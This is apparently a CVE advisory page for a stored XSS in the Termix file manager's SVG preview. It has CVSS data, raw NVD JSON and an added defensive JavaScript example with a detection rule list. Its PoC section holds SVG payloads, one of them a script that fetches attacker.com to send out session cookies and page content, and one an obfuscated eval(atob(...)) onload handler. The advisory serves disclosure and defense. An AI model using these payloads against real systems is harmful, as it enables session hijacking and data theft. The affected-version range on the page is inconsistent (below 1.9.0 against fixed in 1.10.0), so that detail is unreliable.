Security Vulnerability Report
CVE-2026-22804 CVSS 8.0 HIGH

Published: 2026-01-12 23:15:53
Last Modified: 2026-01-16 18:37:33

Description

Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. From 1.7.0 to 1.9.0, a stored cross-site scripting (XSS) vulnerability exists in the Termix File Manager component. The application fails to sanitize SVG file content before rendering it. This allows an attacker who has compromised a managed SSH server to plant a malicious file which, when previewed by the Termix user, executes arbitrary JavaScript in the context of the application. The vulnerability is located in src/ui/desktop/apps/file-manager/components/FileViewer.tsx. This vulnerability is fixed in 1.10.0.
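The defensive pattern the description points to is to treat SVG fetched from a managed host as untrusted and never hand its markup to innerHTML or dangerouslySetInnerHTML. The following is an added JavaScript example, not Termix's own FileViewer code: it always renders the preview through an <img> data: URL (browsers do not execute <script> elements or on*= handlers in SVG loaded that way) and, separately, runs a heuristic scan so that script-bearing files served by a managed host can be logged or alerted on. All function and rule names, and the sample SVG strings, are constructed for this example.

```javascript
// Added example (not Termix's own code). Two independent layers:
//   1. renderSvgPreview() always produces an <img> data: URL. Browsers do not
//      run <script> or on*= handlers in an SVG loaded through <img>, so the
//      preview cannot execute JavaScript in the application's origin.
//   2. scanSvgForActiveContent() is a heuristic detector used only to flag
//      suspicious files for logging or alerting; the safe rendering in (1)
//      does not depend on it. Rule and function names are hypothetical.

const ACTIVE_CONTENT_RULES = [
  { name: 'script-element',    re: /<\s*script\b/i },
  { name: 'event-handler',     re: /\bon[a-z]+\s*=/i },
  { name: 'javascript-url',    re: /href\s*=\s*["']?\s*javascript\s*:/i },
  { name: 'foreignObject',     re: /<\s*foreignObject\b/i },
  { name: 'embedded-document', re: /<\s*(iframe|embed|object)\b/i },
  { name: 'external-ref',      re: /<\s*(use|image)\b[^>]*href\s*=\s*["']?\s*(https?:|\/\/)/i },
];

// Returns the names of the rules that matched, in rule order. Matching is
// deliberately broad (it will also flag "on=" inside a text node) and can miss
// entity-encoded attributes, which is why rendering never relies on this scan.
function scanSvgForActiveContent(svgText) {
  return ACTIVE_CONTENT_RULES.filter(r => r.re.test(svgText)).map(r => r.name);
}

// Builds an <img>-safe data: URL. encodeURIComponent keeps it portable between
// Node and the browser and escapes '#', so fragment identifiers inside the SVG
// cannot truncate the URL.
function svgToImgSrc(svgText) {
  return 'data:image/svg+xml,' + encodeURIComponent(svgText);
}

// Decides how the viewer presents the file. The element is always an image
// (never inline markup); 'findings' is what a detection pipeline would log
// when a managed host serves script-bearing SVG.
function renderSvgPreview(svgText, sourceHost) {
  const findings = scanSvgForActiveContent(svgText);
  return {
    element: 'img',
    src: svgToImgSrc(svgText),
    alt: 'SVG preview',
    findings,
    alert: findings.length > 0
      ? `active content in SVG served by ${sourceHost}: ${findings.join(', ')}`
      : null,
  };
}

// Constructed sample inputs (not taken from the advisory).
const BENIGN_SVG = '<svg xmlns="http://www.w3.org/2000/svg"><rect width="10" height="10" fill="red"/></svg>';
const SCRIPTED_SVG = '<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>';
const HANDLER_SVG = '<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"></svg>';

for (const svg of [BENIGN_SVG, SCRIPTED_SVG, HANDLER_SVG]) {
  const plan = renderSvgPreview(svg, 'managed-host.example');
  console.log(plan.element, JSON.stringify(plan.findings), plan.alert);
}
```

In a React viewer the returned object maps directly onto `<img src={plan.src} alt={plan.alt} />`; the point of the design is that the security property comes from the image rendering path, while the scan only feeds detection. A full sanitizer such as DOMPurify is the alternative when inline SVG rendering is genuinely required.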

CVSS Details

CVSS Score: 8.0
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:termix:termix:*:*:*:*:*:*:*:* - VULNERABLE
Termix >= 1.7.0
Termix < 1.9.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
xml
<!-- Malicious SVG file example - stored XSS PoC -->
<svg xmlns="http://www.w3.org/2000/svg">
  <script>alert(document.cookie)</script>
  <rect width="100" height="100" fill="red"/>
</svg>

<!-- More complex XSS payload -->
<svg xmlns="http://www.w3.org/2000/svg">
  <script>
    // Steal the user's session information
    fetch('https://attacker.com/steal?cookie=' + encodeURIComponent(document.cookie))
    // Grab the page content
    fetch('https://attacker.com/steal?data=' + encodeURIComponent(document.body.innerHTML))
  </script>
</svg>

<!-- SVG payload that bypasses filtering -->
<svg xmlns="http://www.w3.org/2000/svg" onload="eval(atob('YWxlcnQoJ1hTUyBFeHBsb2l0ZWQnKQ=='))">
</svg>

References

https://github.com/Termix-SSH/Termix/security/advisories/GHSA-m3cv-5hgp-hv35 (Exploit, Third Party Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-22804",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-12T23:15:53.063",
    "lastModified": "2026-01-16T18:37:32.920",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. From 1.7.0 to 1.9.0, Stored Cross-Site Scripting (XSS) vulnerability exists in the Termix File Manager component. The application fails to sanitize SVG file content before rendering it. This allows an attacker who has compromised a managed SSH server to plant a malicious file, which, when previewed by the Termix user, executes arbitrary JavaScript in the context of the application. The vulnerability is located in src/ui/desktop/apps/file-manager/components/FileViewer.tsx. This vulnerability is fixed in 1.10.0."
      },
      {
        "lang": "es",
        "value": "Termix es una plataforma de gestión de servidores basada en web con capacidades de terminal SSH, tunelización y edición de archivos. Desde la versión 1.7.0 hasta la 1.9.0, existe una vulnerabilidad de cross-site scripting (XSS) almacenado en el componente Termix File Manager. La aplicación no logra sanear el contenido de archivos SVG antes de renderizarlo. Esto permite a un atacante que ha comprometido un servidor SSH gestionado plantar un archivo malicioso, el cual, al ser previsualizado por el usuario de Termix, ejecuta JavaScript arbitrario en el contexto de la aplicación. La vulnerabilidad se encuentra en src/ui/desktop/apps/file-manager/components/FileViewer.tsx. Esta vulnerabilidad se corrigió en la versión 1.10.0."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N",
            "baseScore": 8.0,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.6,
          "impactScore": 5.8
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 4.7,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.6,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-79"},
          {"lang": "en", "value": "CWE-269"}
        ]
      },
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-79"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:termix:termix:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "1.7.0",
                "versionEndExcluding": "1.10.0",
                "matchCriteriaId": "912FDA87-25B4-4E18-B7E9-FC8AA0FCF398"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/Termix-SSH/Termix/security/advisories/GHSA-m3cv-5hgp-hv35",
        "source": "[email protected]",
        "tags": ["Exploit", "Third Party Advisory"]
      },
      {
        "url": "https://github.com/Termix-SSH/Termix/security/advisories/GHSA-m3cv-5hgp-hv35",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "tags": ["Exploit", "Third Party Advisory"]
      }
    ]
  }
}